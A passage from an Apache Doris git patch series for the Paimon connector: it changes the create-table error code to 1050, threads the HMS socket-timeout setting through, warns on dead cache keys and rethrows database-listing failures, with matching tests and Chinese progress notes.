from this FE's cache), +created without `IF NOT EXISTS`, fell through to `metadata.createTable` → `DorisConnectorException` → +re-wrapped as a **generic** `DdlException` (errno `ERR_UNKNOWN_ERROR` = 0). CREATE still failed; only the +error code / SQLSTATE / message regressed. + +## Root Cause + +The bridge ported only the **local** arm's 1050 report. Both legacy ops report 1050 for **both** arms: +legacy paimon `PaimonMetadataOps.performCreateTable` (remote `:195`, local `:212`) and legacy maxcompute +`MaxComputeMetadataOps.createTableImpl` (remote `:184`, local `:195`, verified via git). So 1050-for-remote +is exact parity for both live cut-over connectors. + +## Fix + +`PluginDrivenExternalCatalog.java` — dropped the `if (localExists)` guard. Reaching that point already +guarantees `(remoteExists || localExists) && !isIfNotExists`, so `ErrorReport.reportDdlException( +ERR_TABLE_EXISTS_ERROR, tableName)` now runs unconditionally there, short-circuiting **before** +`metadata.createTable`. Comment rewritten to document both arms + the legacy parity refs. + +### Behavioral delta +- **remote-only existing table, no IF NOT EXISTS:** generic `DdlException` → `DdlException` with errno **1050** + + "Table '' already exists" (legacy parity); `metadata.createTable` no longer called (it only threw). +- **local conflict / IF NOT EXISTS (CTAS no-INSERT) / create-succeeds:** unchanged. +- **es/jdbc/trino (non-create-overriding):** a `CREATE TABLE` on an *existing* table now surfaces 1050 instead + of the old fall-through error — benign/arguably more accurate; non-existing-table path unchanged. + +## Tests (`PluginDrivenExternalCatalogDdlRoutingTest`) + +- **Rewrote** `testCreateTableExistingTableWithoutIfNotExistsStillErrors` → + `testCreateTableExistingRemoteTableWithoutIfNotExistsReportsErrno1050`: it previously encoded the **buggy** + fall-through (`verify(metadata).createTable`); now asserts `getMysqlErrorCode() == ERR_TABLE_EXISTS_ERROR` + + `verify(metadata, never()).createTable` + no editlog. +- **Strengthened** `testCreateTableLocalConflictWithoutIfNotExistsRejects` with the same errno assertion + + refreshed its mutation comment (the two tests together pin "report 1050 on EITHER arm"). +- Added `import org.apache.doris.common.ErrorCode`. + +**RED→GREEN verified empirically:** re-adding the `if (localExists)` guard turns the remote test red +("Expected DdlException … but nothing was thrown" — the buggy path falls through to the no-op mock +`createTable`); removing it → green. Local test stays green under the mutation (correct — it guards the +other arm). + +## Result + +- `PluginDrivenExternalCatalogDdlRoutingTest` 26/0/0, `PluginDrivenExternalTableEngineTest` 12/0/0; fe-core + compiles; checkstyle clean (validate phase). Build cache disabled. +- Diagnostic/contract-only change (error code/SQLSTATE/message); CREATE outcome (failure) unchanged. +- **e2e:** reaching "remote exists, local-cache absent" needs multi-FE / external create; paimon e2e gated + (`enablePaimonTest=false`) → none added (documented; fail-loud). diff --git a/plan-doc/task-list-P6-fixes.md b/plan-doc/task-list-P6-fixes.md index d54f36245d00b2..1bda1db08b0101 100644 --- a/plan-doc/task-list-P6-fixes.md +++ b/plan-doc/task-list-P6-fixes.md @@ -25,7 +25,13 @@ es/jdbc gain new (NPE-safe, rule-mandated) VERBOSE output. New `PluginDrivenScanNodeVerboseExplainTest` (3 tests, RED→GREEN mutation-verified); 45/0/0 `PluginDrivenScanNode*` + checkstyle clean; e2e gated/not-run. es_http `ES terminate_after:` gate left as separate residual (R3-LAYER-2). See FIX-R3-RESIDUAL-{design,summary}.md. -- [ ] **P6-R1-table** bridge `createTable`: add `remoteExists && !ifNotExists` arm → `ERR_TABLE_EXISTS_ERROR` (1050). +- [x] **P6-R1-table** bridge `createTable`: report `ERR_TABLE_EXISTS_ERROR` (1050) for a remote-existing table — + **DONE** — dropped the `if (localExists)` guard so the existence-branch reports 1050 unconditionally (remote + OR local arm), short-circuiting before `metadata.createTable`. Exact legacy parity (paimon `:195/:212` + + maxcompute `:184/:195`, both arms 1050). Generic bridge → all SPI connectors; es/jdbc/trino existing-table + CREATE now says "already exists" (benign, NIT). Rewrote remote test + strengthened local test with errno + assertion (RED→GREEN mutation-verified); 26/0/0 DdlRouting + 12/0/0 Engine + checkstyle clean; e2e gated. + Design red-team `wf_19fd7785-165` (0 actionable). See FIX-R1-TABLE-{design,summary}.md. - [ ] **P6-C4** thread `hive_metastore_client_timeout_second` through `ConnectorContext.getEnvironment()`. - [ ] **P6-R2-catalog** warn-and-strip now-dead `meta.cache.paimon.table.*` keys at CREATE CATALOG. - [ ] **P6-R3-catalog** include catalog name in `listDatabaseNames` `LOG.warn` (decide keep best-effort swallow). From c83a10a1492e8391ef2e5dcfc33224f6b8c220cb Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 09:26:55 +0800 Subject: [PATCH 107/128] =?UTF-8?q?docs(catalog-spi):=20P6=20R1-table=20fi?= =?UTF-8?q?x=20done=20=E2=86=92=20HANDOFF=20next=20=3D=20C4/R2-catalog/R3-?= =?UTF-8?q?catalog?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit R1-table (drop localExists guard in PluginDrivenExternalCatalog.createTable so a remote-existing table without IF NOT EXISTS reports MySQL errno 1050) committed as f652b40d210. Exact legacy parity (paimon+maxcompute, remote+local arms both 1050). Design red-team wf_19fd7785-165 (0 actionable). Next = the 3 combinable MINORs: C4 (thread hive_metastore_client_timeout_second), R2-catalog (warn-and-strip dead meta.cache.paimon.table.* keys), R3-catalog (catalog name in listDatabaseNames LOG.warn), then the accept-as-deviation batch. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 894cb3ba6982ff..0ce459bb848ad6 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,11 +6,11 @@ --- -# 🎯 下一个 session 的任务 — **P6 修复进行中:R3-residual DONE → 下一个 = R1-table (MINOR)** +# 🎯 下一个 session 的任务 — **P6 修复进行中:R1-table DONE → 下一个 = C4 / R2-catalog / R3-catalog (3 MINOR, 可合一)** > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 -> **✅ C1 (MinIO, MAJOR) `9967846ef64`** / **✅ C2 (HDFS XML, MAJOR) `e95128aed5b`**(详见 git log + 各自 design/summary)。 +> **✅ C1 (MinIO, MAJOR) `9967846ef64`** / **✅ C2 (HDFS XML, MAJOR) `e95128aed5b`** / **✅ R3-residual (MINOR) `44499f073e8`**(详见 git log + 各自 design/summary)。 > **✅ R3-residual (MINOR) 已完成**:去 `PluginDrivenScanNode.getNodeExplainString` 的 `"paimon".equals(getType())` > gate,VERBOSE backends 块改无条件 emit(gate 变 `VERBOSE && !isBatchMode()`,与父 `FileScanNode` 完全一致)+ 重写假注释。 > **红队纠正了 scope**(比 review 的「maxcompute」更广):`SPI_READY_TYPES={jdbc,es,trino-connector,max_compute,paimon}` 全走 @@ -20,8 +20,14 @@ > 重加 gate → 非-paimon 测变红);45/0/0 `PluginDrivenScanNode*` UT + checkstyle 干净;**e2e gated/未跑**。 > es_http `ES terminate_after:` gate 作**独立残留**留下(R3-LAYER-2,键 file-format-type 非 getType(),规则字面不违反)。 > 设计/红队结论详见 `designs/FIX-R3-RESIDUAL-{design,summary}.md`(design 红队 3 lens finder→verifier `wf_3518653b-3cb`)。 -> **下一个 = R1-table (MINOR)**:bridge `createTable` 补 `remoteExists && !ifNotExists` 臂 → 报 `ERR_TABLE_EXISTS_ERROR`(1050)。 -> 然后 3 个 MINOR(C4 / R2-catalog / R3-catalog 可合一),最后 accept-as-deviation 批次。 +> **✅ R1-table (MINOR) 已完成**:`PluginDrivenExternalCatalog.createTable`(**通用桥**,全 SPI 连接器)去 `if (localExists)` +> 守卫 → 存在分支无条件报 `ERR_TABLE_EXISTS_ERROR`(MySQL **1050**/42S01),在 `metadata.createTable` 前短路。修「表只远端存在、 +> 本 FE 缓存缺」(陈旧缓存/他 FE/外部建)+ 无 IF NOT EXISTS 时丢 1050 退化成泛化 DdlException(errno 0)。精确 legacy parity +> (paimon `:195/:212` + maxcompute `:184/:195`,remote+local 两臂皆 1050)。es/jdbc/trino 对已存在表 CREATE 现报「already exists」(NIT)。 +> 改写 remote 测 + 强化 local 测加 errno 断言(**RED→GREEN 突变验证**:重加守卫→remote 测红);26/0/0 DdlRouting + 12/0/0 Engine + +> checkstyle 干净;**e2e gated**。design 红队 `wf_19fd7785-165`(0 actionable)。详见 `designs/FIX-R1-TABLE-{design,summary}.md`。 +> **下一个 = C4 / R2-catalog / R3-catalog(3 MINOR,可合一)**:C4 透传 `hive_metastore_client_timeout_second`;R2-catalog +> warn-and-strip 死键 `meta.cache.paimon.table.*`;R3-catalog `listDatabaseNames` `LOG.warn` 带 catalog 名。最后 accept-as-deviation 批次。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 报告:[`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md)(未跟踪,待 vet+commit)。 @@ -60,8 +66,11 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 gate,VERBOSE backends 块无条件 emit(与父 `FileScanNode` gate 一致)+ 重写假注释。红队纠正 scope=全 5 个 SPI 连接器 (paimon 不变 / maxcompute+trino 恢复 / es+jdbc 新增 NPE-safe 输出);新 UT 3 测 RED→GREEN;45/0/0 + checkstyle 干净。 es_http gate 留作 R3-LAYER-2 独立残留。详见 `designs/FIX-R3-RESIDUAL-{design,summary}.md`。 - - **R1 table**(MINOR,下一个):bridge `createTable` 补 `remoteExists && !ifNotExists` 臂报 `ERR_TABLE_EXISTS_ERROR`(1050)。 - - **C4 / R2-catalog / R3-catalog**(MINOR,可合一):HMS socket timeout 透传 `hive_metastore_client_timeout_second` / + - ✅ **R1 table**(MINOR)— **DONE `44499f073e8` 之后**:`PluginDrivenExternalCatalog.createTable`(通用桥)去 `if (localExists)` + 守卫 → 存在分支无条件报 `ERR_TABLE_EXISTS_ERROR`(1050),在 `metadata.createTable` 前短路;精确 legacy parity(paimon+maxcompute + remote+local 两臂皆 1050);改写 remote 测 + 强化 local 测 errno 断言(RED→GREEN);26/0/0+12/0/0+checkstyle 干净;红队 0 actionable。 + 详见 `designs/FIX-R1-TABLE-{design,summary}.md`。 + - **C4 / R2-catalog / R3-catalog**(MINOR,可合一,下一个):HMS socket timeout 透传 `hive_metastore_client_timeout_second` / `meta.cache.paimon.table.*` warn-and-strip(键已 dead)/ `listDatabaseNames` `LOG.warn` 带 catalog 名(择一)。 - 其余 MINOR/NIT + wave2 新增(全 intentional-deviation):报告已标「文档化为接受偏离」,逐条 accept-as-deviation(含用户签字)。 1. **B8 legacy 删除(review 已解锁;须分阶段,按报告 §B8 deletion readiness 的 DEAD vs STILL-CONSUMED ledger)**: @@ -86,7 +95,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `44499f073e8`**(P6 修复 R3-residual;前序 `e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `f652b40d210`**(P6 修复 R1-table;前序 `44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); 已同步 push 到 `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head, force-with-lease)。 - **主线(P0–P5)**:paimon connector SPI cutover + round-3 clean-room review 的 4 个 user-approved fix 全完成 From 82b6de0de986cb6ec032bd8ae739efac075e246c Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 10:30:43 +0800 Subject: [PATCH 108/128] =?UTF-8?q?fix:=20P6-C4/R2-catalog/R3-catalog=20?= =?UTF-8?q?=E2=80=94=20HMS=20socket-timeout,=20dead=20cache-key=20warn,=20?= =?UTF-8?q?listDatabaseNames=20rethrow?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Combined fix for three MINOR findings from the P6 paimon full-path clean-room review (reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md). Design + summary in plan-doc/designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md. C4 (missing-port) — HMS metastore client socket-timeout was hardcoded "10" in the SPI move, ignoring Config.hive_metastore_client_timeout_second (metastore-spi has no fe-common dep). Thread the FE config value through ConnectorContext.getEnvironment() into HmsMetaStoreProperties.toHiveConfOverrides(String). Byte-identical "10" when fe.conf unset (Config default 10); an operator who raises it now gets the configured value (restores HMSBaseProperties:204-208). User-override guard unchanged; only the HMS branch threads it (DLF/JDBC/REST/FS have no socket-timeout default). R2-catalog (missing-port) — legacy PaimonExternalCatalog.checkProperties validated meta.cache.paimon.table.{enable,ttl-second,capacity} via CacheSpec; the plugin path dropped those checks. The keys are dead on the plugin path: a cut-over paimon table reports meta-cache engine "default" (ExternalTable.getMetaCacheEngine, not overridden by PluginDriven), so it never reaches PaimonExternalMetaCache (engine "paimon") which these keys size. Warn (not reject, not strip) in PaimonConnectorProvider.validateProperties — re-validating a dead knob is pointless and stripping would mutate persisted props; the key is paimon-specific so it lives in the connector, not the connector-agnostic bridge. R3-catalog (regression) — PaimonConnectorMetadata.listDatabaseNames swallowed remote failures to emptyList (a transient metastore failure showed as "zero databases"), with a comment falsely claiming legacy parity. Rethrow RuntimeException with the catalog name exactly as legacy PaimonMetadataOps:340 did, matching every other connector (all propagate). executeAuthenticated (M-11 Kerberos wrap) preserved; bridge does not catch, so it reaches DB-init as legacy did. Tests: paimon 280/0/0 (+1 gated skip); PaimonConnectorValidatePropertiesTest 14/0 (+R2 no-reject); PaimonConnectorMetadataReadAuthTest 12/0 (R3 swallow→rethrow migrated, M-11 coverage kept); HmsMetaStorePropertiesTest 16/0 (+3 C4); MetaStorePropertiesContractTest 3/0; fe-core compiles; checkstyle 0; connector import-check clean. Design + impl red-team both clean (0 actionable). e2e gated (enablePaimonTest=false), NOT run. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore/HmsMetaStoreProperties.java | 6 +- .../MetaStorePropertiesContractTest.java | 4 +- .../spi/hms/HmsMetaStorePropertiesImpl.java | 13 +- .../spi/hms/HmsMetaStorePropertiesTest.java | 44 ++++- .../paimon/PaimonCatalogFactory.java | 4 +- .../connector/paimon/PaimonConnector.java | 4 +- .../paimon/PaimonConnectorMetadata.java | 11 +- .../paimon/PaimonConnectorProvider.java | 28 +++ .../PaimonConnectorMetadataReadAuthTest.java | 13 +- ...PaimonConnectorValidatePropertiesTest.java | 11 ++ .../connector/DefaultConnectorContext.java | 5 + .../doris/kerberos/KerberosAuthSpec.java | 2 +- .../designs/FIX-C4-R2-R3-CATALOG-design.md | 177 ++++++++++++++++++ .../designs/FIX-C4-R2-R3-CATALOG-summary.md | 64 +++++++ 14 files changed, 358 insertions(+), 28 deletions(-) create mode 100644 plan-doc/designs/FIX-C4-R2-R3-CATALOG-design.md create mode 100644 plan-doc/designs/FIX-C4-R2-R3-CATALOG-summary.md diff --git a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java index 2e4b85188ec497..eacc602bb74aab 100644 --- a/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java +++ b/fe/fe-connector/fe-connector-metastore-api/src/main/java/org/apache/doris/connector/metastore/HmsMetaStoreProperties.java @@ -38,8 +38,12 @@ public interface HmsMetaStoreProperties extends MetaStoreProperties { /** * Neutral {@code hive.*} / {@code hadoop.security.*} / SASL overrides to be layered onto the * connector's {@code HiveConf}. Includes the HMS service principal when configured. + * + * @param defaultClientSocketTimeoutSeconds the metastore client socket-timeout (seconds) to apply when the + * user has not set {@code hive.metastore.client.socket.timeout}; the engine threads the FE + * {@code hive_metastore_client_timeout_second} config value here (C4). Blank falls back to {@code "10"}. */ - Map toHiveConfOverrides(); + Map toHiveConfOverrides(String defaultClientSocketTimeoutSeconds); /** * The client Kerberos login facts (principal/keytab), present only for a Kerberos-secured diff --git a/fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java b/fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java index 8727bb2996ffcc..0766f394bdbd89 100644 --- a/fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java +++ b/fe/fe-connector/fe-connector-metastore-api/src/test/java/org/apache/doris/connector/metastore/MetaStorePropertiesContractTest.java @@ -113,7 +113,7 @@ public AuthType getAuthType() { } @Override - public Map toHiveConfOverrides() { + public Map toHiveConfOverrides(String defaultClientSocketTimeoutSeconds) { return Map.of("hive.metastore.sasl.enabled", "true"); } @@ -125,7 +125,7 @@ public Optional kerberos() { Assertions.assertEquals("thrift://hms:9083", hms.getUri()); Assertions.assertEquals(AuthType.KERBEROS, hms.getAuthType()); - Assertions.assertEquals("true", hms.toHiveConfOverrides().get("hive.metastore.sasl.enabled")); + Assertions.assertEquals("true", hms.toHiveConfOverrides("10").get("hive.metastore.sasl.enabled")); Assertions.assertTrue(hms.kerberos().isPresent()); Assertions.assertTrue(hms.kerberos().get().hasCredentials()); Assertions.assertEquals("hive/_HOST@REALM", hms.kerberos().get().getPrincipal()); diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java index 28a04ad5c9edea..32a6c23f8ea0a9 100644 --- a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java @@ -32,7 +32,7 @@ import java.util.Optional; /** - * Hive Metastore (HMS) backend facts. {@link #toHiveConfOverrides()} produces the neutral key map the + * Hive Metastore (HMS) backend facts. {@link #toHiveConfOverrides(String)} produces the neutral key map the * connector layers onto its own {@code HiveConf} (the connector seeds {@code new HiveConf()} + * {@code hive.conf.resources} first, then applies these overrides). Ported faithfully from the paimon * connector's {@code buildHmsHiveConf} (the up-move source), whose ordering is load-bearing: the @@ -155,7 +155,7 @@ public Optional kerberos() { } @Override - public Map toHiveConfOverrides() { + public Map toHiveConfOverrides(String defaultClientSocketTimeoutSeconds) { Map conf = new LinkedHashMap<>(); // 1. All user hive.* keys verbatim (legacy initUserHiveConfig). raw.forEach((k, v) -> { @@ -175,9 +175,14 @@ public Map toHiveConfOverrides() { putIfNotBlank(conf, "hadoop.security.authentication", hdfsAuthType); putIfNotBlank(conf, "hadoop.kerberos.principal", hdfsKerberosPrincipal); putIfNotBlank(conf, "hadoop.kerberos.keytab", hdfsKerberosKeytab); - // 4. Metastore client socket-timeout default (legacy checkAndInit: default 10s when unset). + // 4. Metastore client socket-timeout default. Legacy checkAndInit applied + // Config.hive_metastore_client_timeout_second (default 10s) when the user had not set + // hive.metastore.client.socket.timeout. metastore-spi cannot read FE Config, so the engine threads the + // configured default in via ConnectorContext.getEnvironment() (C4); blank falls back to the legacy 10s. if (StringUtils.isBlank(raw.get("hive.metastore.client.socket.timeout"))) { - conf.put("hive.metastore.client.socket.timeout", "10"); + conf.put("hive.metastore.client.socket.timeout", + StringUtils.isNotBlank(defaultClientSocketTimeoutSeconds) + ? defaultClientSocketTimeoutSeconds : "10"); } // 5. Storage overlay (legacy buildHiveConfiguration + appendUserHadoopConfig). BEFORE kerberos. MetaStoreParseUtils.applyStorageConfig(storageHadoopConfig, raw, conf::put); diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java index f16741ad566bc5..c2c439e4c15ffc 100644 --- a/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java +++ b/fe/fe-connector/fe-connector-metastore-spi/src/test/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesTest.java @@ -53,7 +53,7 @@ public void simpleEmitsUriAndSocketTimeoutOnly() { Assertions.assertEquals(AuthType.SIMPLE, props.getAuthType()); Assertions.assertFalse(props.kerberos().isPresent()); - Map conf = props.toHiveConfOverrides(); + Map conf = props.toHiveConfOverrides("10"); Assertions.assertEquals("thrift://h:9083", conf.get("hive.metastore.uris")); Assertions.assertEquals("10", conf.get("hive.metastore.client.socket.timeout")); // No kerberos leakage on a simple catalog. @@ -73,7 +73,7 @@ public void kerberosEmitsServicePrincipalSaslAndCarriesClientFacts() { "hadoop.security.auth_to_local", "RULE:[1:$1]", "warehouse", "wh")); - Map conf = props.toHiveConfOverrides(); + Map conf = props.toHiveConfOverrides("10"); Assertions.assertEquals("kerberos", conf.get("hive.metastore.authentication.type")); Assertions.assertEquals("doris@REALM", conf.get("hive.metastore.client.principal")); Assertions.assertEquals("/etc/doris.keytab", conf.get("hive.metastore.client.keytab")); @@ -100,7 +100,7 @@ public void kerberosBlockRunsAfterStorageOverlaySoItIsNotClobbered() { "hive.metastore.client.principal", "p", "hive.metastore.client.keytab", "k", "hadoop.security.authentication", "simple", "warehouse", "wh")); - Map conf = props.toHiveConfOverrides(); + Map conf = props.toHiveConfOverrides("10"); Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); Assertions.assertEquals("true", conf.get("hive.metastore.sasl.enabled")); } @@ -113,7 +113,7 @@ public void hdfsKerberosFallbackWhenMetastoreAuthIsNotSet() { "hadoop.kerberos.principal", "hdfs@REALM", "hadoop.kerberos.keytab", "/etc/hdfs.keytab", "warehouse", "wh")); - Map conf = props.toHiveConfOverrides(); + Map conf = props.toHiveConfOverrides("10"); Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); Assertions.assertEquals("true", conf.get("hive.metastore.sasl.enabled")); // Metastore auth type itself is unset -> SIMPLE, but the effective kerberos facts come from HDFS. @@ -128,7 +128,7 @@ public void hdfsKerberosFallbackWhenMetastoreAuthIsNotSet() { public void usernameAliasResolvesToHadoopUsername() { Map conf = of(raw( "hive.metastore.uris", "thrift://h", "hive.metastore.username", "bob", "warehouse", "wh")) - .toHiveConfOverrides(); + .toHiveConfOverrides("10"); Assertions.assertEquals("bob", conf.get("hadoop.username")); } @@ -181,7 +181,7 @@ public void storageOverlayRunsBeforeKerberosBlockViaStorageMapChannel() { "hive.metastore.uris", "thrift://h", "hive.metastore.authentication.type", "kerberos", "hive.metastore.client.principal", "p", "hive.metastore.client.keytab", "k", - "warehouse", "wh"), storage).toHiveConfOverrides(); + "warehouse", "wh"), storage).toHiveConfOverrides("10"); Assertions.assertEquals("ran", conf.get("fs.s3a.marker")); Assertions.assertEquals("kerberos", conf.get("hadoop.security.authentication")); } @@ -202,7 +202,7 @@ public void usernameAliasOverwritesStorageHadoopUsername() { storage.put("hadoop.username", "from-storage"); Map conf = HmsMetaStorePropertiesImpl.of(raw( "hive.metastore.uris", "thrift://h", "hive.metastore.username", "bob", "warehouse", "wh"), - storage).toHiveConfOverrides(); + storage).toHiveConfOverrides("10"); Assertions.assertEquals("bob", conf.get("hadoop.username")); } @@ -216,17 +216,43 @@ public void hdfsKerberosFallbackSuppressedWhenMetastoreAuthIsSimple() { "hadoop.kerberos.principal", "hdfs@REALM", "hadoop.kerberos.keytab", "/k", "warehouse", "wh")); Assertions.assertFalse(props.kerberos().isPresent()); - Assertions.assertFalse(props.toHiveConfOverrides().containsKey("hive.metastore.sasl.enabled")); + Assertions.assertFalse(props.toHiveConfOverrides("10").containsKey("hive.metastore.sasl.enabled")); } @Test public void userSuppliedSocketTimeoutSurvivesTheDefault() { Map conf = of(raw( "hive.metastore.uris", "thrift://h", "hive.metastore.client.socket.timeout", "30", - "warehouse", "wh")).toHiveConfOverrides(); + "warehouse", "wh")).toHiveConfOverrides("10"); Assertions.assertEquals("30", conf.get("hive.metastore.client.socket.timeout")); } + @Test + public void threadedSocketTimeoutDefaultFlowsThrough() { + // C4: the FE-configured hive_metastore_client_timeout_second (threaded as the default arg) is applied + // instead of the hardcoded 10 when the user did not set hive.metastore.client.socket.timeout. + Map conf = of(raw("hive.metastore.uris", "thrift://h", "warehouse", "wh")) + .toHiveConfOverrides("60"); + Assertions.assertEquals("60", conf.get("hive.metastore.client.socket.timeout")); + } + + @Test + public void userSocketTimeoutOverridesThreadedDefault() { + // C4: a per-catalog hive.metastore.client.socket.timeout still wins over the threaded FE default. + Map conf = of(raw( + "hive.metastore.uris", "thrift://h", "hive.metastore.client.socket.timeout", "30", + "warehouse", "wh")).toHiveConfOverrides("60"); + Assertions.assertEquals("30", conf.get("hive.metastore.client.socket.timeout")); + } + + @Test + public void blankThreadedSocketTimeoutFallsBackToTen() { + // C4: defensive fallback — a blank threaded default keeps the historical 10s (legacy parity when unset). + Map conf = of(raw("hive.metastore.uris", "thrift://h", "warehouse", "wh")) + .toHiveConfOverrides(""); + Assertions.assertEquals("10", conf.get("hive.metastore.client.socket.timeout")); + } + @Test public void matchedPropertiesIncludesMatchedAliasesAndExcludesUnmatched() { Map matched = of(raw( diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index 7ab3b2b038a1b0..1f7324578f8aae 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -50,7 +50,7 @@ * *

    The metastore CONNECTION facts (validate rules, HMS/DLF HiveConf key sets, JDBC driver-url * resolution, alias arrays) were moved to the shared {@code fe-connector-metastore-spi} - * ({@code MetaStoreProviders.bind} -> {@code HmsMetaStoreProperties.toHiveConfOverrides()} / + * ({@code MetaStoreProviders.bind} -> {@code HmsMetaStoreProperties.toHiveConfOverrides(String)} / * {@code DlfMetaStoreProperties.toDlfCatalogConf()}; {@code JdbcDriverSupport.resolveDriverUrl}) — see P2-T03. */ public final class PaimonCatalogFactory { @@ -308,7 +308,7 @@ private static void applyStorageConfig(Map storageHadoopConfig, * base, then overrides). * *

    The {@code overrides} are produced by the shared metastore parsers - * ({@code HmsMetaStoreProperties.toHiveConfOverrides()} — uri + verbatim {@code hive.*} + auth keys + * ({@code HmsMetaStoreProperties.toHiveConfOverrides(String)} — uri + verbatim {@code hive.*} + auth keys * + socket-timeout default + storage overlay + kerberos block last; or * {@code DlfMetaStoreProperties.toDlfCatalogConf()} — the 8 {@code dlf.catalog.*} keys + OSS storage * overlay), which own the ordering-sensitive logic (storage overlay BEFORE the kerberos block). This diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 8f09257ad963fd..76b8760577b7f9 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -180,7 +180,9 @@ private Catalog createCatalog() { // external hive-site.xml as the BASE first, then overlays the overrides (F2 ordering). HmsMetaStoreProperties hms = (HmsMetaStoreProperties) MetaStoreProviders.bind(properties, storageHadoopConfig); - HiveConf hc = PaimonCatalogFactory.assembleHiveConf(hiveConfFiles, hms.toHiveConfOverrides()); + HiveConf hc = PaimonCatalogFactory.assembleHiveConf(hiveConfFiles, + hms.toHiveConfOverrides(context.getEnvironment() + .getOrDefault("hive_metastore_client_timeout_second", "10"))); return createCatalogFromContext(CatalogContext.create(options, hc), flavor, "Failed to create Paimon catalog with HMS metastore"); } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 530e2b89a61147..3417790328472e 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -93,13 +93,16 @@ public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map @Override public List listDatabaseNames(ConnectorSession session) { - // M-11: wrap the remote read in executeAuthenticated so the FE-injected Kerberos UGI applies - // (legacy PaimonMetadataOps.listDatabaseNames wrapped it too). Full read-vs-DDL parity (D-052). + // M-11: wrap the remote read in executeAuthenticated so the FE-injected Kerberos UGI applies (legacy + // PaimonMetadataOps.listDatabaseNames wrapped it too). On failure, rethrow with the catalog name exactly + // as legacy PaimonMetadataOps did (R3) — swallowing to an empty list would mask a transient metastore + // failure as "zero databases" and diverges from every other connector (all propagate). Read-vs-DDL + // parity (D-052). try { return context.executeAuthenticated(() -> catalogOps.listDatabases()); } catch (Exception e) { - LOG.warn("Failed to list Paimon databases", e); - return Collections.emptyList(); + throw new 